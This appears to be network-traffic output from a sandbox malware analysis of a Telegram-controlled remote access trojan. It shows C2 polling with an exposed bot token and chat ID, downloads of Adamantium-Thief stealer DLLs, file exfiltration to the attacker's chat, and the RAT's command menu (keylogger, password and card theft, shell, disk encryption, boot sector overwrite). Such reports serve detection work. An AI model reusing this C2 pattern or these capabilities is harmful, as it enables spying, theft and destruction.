https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:35 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:36 GMT
Content-Type: application/json
Content-Length: 23
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

raw.githubusercontent.com

yanak.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll

yanak.exe

Remote address:

185.199.111.133:443

Request

GET /LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 61368
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "d33d580aba7cb45483974ba24a8592974d274b0f5735a7e056945e3b58b09a1a"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 7F1D:3A5FED:1CC085:219D7E:675082F7
Accept-Ranges: bytes
Date: Wed, 04 Dec 2024 16:27:36 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600064-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1733329656.880684,VS0,VE136
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9d631725c38c604e5fb69df92dc1c03a8fdfbe49
Expires: Wed, 04 Dec 2024 16:32:36 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll

yanak.exe

Remote address:

185.199.111.133:443

Request

GET /LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 488888
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "e83bee8c3afe9e780b19482aa94b6ec488f62b7073d2366160a5ccb737bbfcfa"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 9702:39D88F:1C16BD:20F394:675082F8
Accept-Ranges: bytes
Date: Wed, 04 Dec 2024 16:27:36 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600064-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1733329656.121644,VS0,VE229
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 79fb8e98c228f6e7588f6fc5d4d1bfa0e6fcd475
Expires: Wed, 04 Dec 2024 16:32:36 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll

yanak.exe

Remote address:

185.199.111.133:443

Request

GET /LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 406968
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "fe8176a7437d01bedeb40863296e8d083c06df2032024b06745768647b339801"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 94D9:3B894A:1D351C:22121A:675082F8
Accept-Ranges: bytes
Date: Wed, 04 Dec 2024 16:27:36 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600064-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1733329657.512437,VS0,VE290
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c256650a9a8dc6915f8aa52356447c375a68f428
Expires: Wed, 04 Dec 2024 16:32:36 GMT
Source-Age: 0
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
POST

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835

yanak.exe

Remote address:

149.154.167.220:443

Request

POST /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835 HTTP/1.1
Content-Type: multipart/form-data; boundary="737812dc-fa9e-41e0-877b-cd608d03cc64"
Host: api.telegram.org
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:37 GMT
Content-Type: application/json
Content-Length: 427
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
POST

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835

yanak.exe

Remote address:

149.154.167.220:443

Request

POST /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendDocument?chat_id=5569740835 HTTP/1.1
Content-Type: multipart/form-data; boundary="b246e7b3-f3c9-4b62-a165-d593ff726f7e"
Host: api.telegram.org
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:30 GMT
Content-Type: application/json
Content-Length: 426
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:40 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:41 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:28:44 GMT
Content-Type: application/json
Content-Length: 350
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response

149.154.167.220:443

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

tls, http

yanak.exe

27.0kB
64.5kB
214
128

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%8D%80%20Bot%20connected

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=1

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=2

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=3

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=4

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=5

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=6

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=7

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=8

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=9

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=10

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=11

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293321

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293322

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293323

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293343

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293344

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293345

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293323

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%83%20Uploading%20file...

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%A1%20Unknown%20command

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

HTTP Response

200

HTTP Request

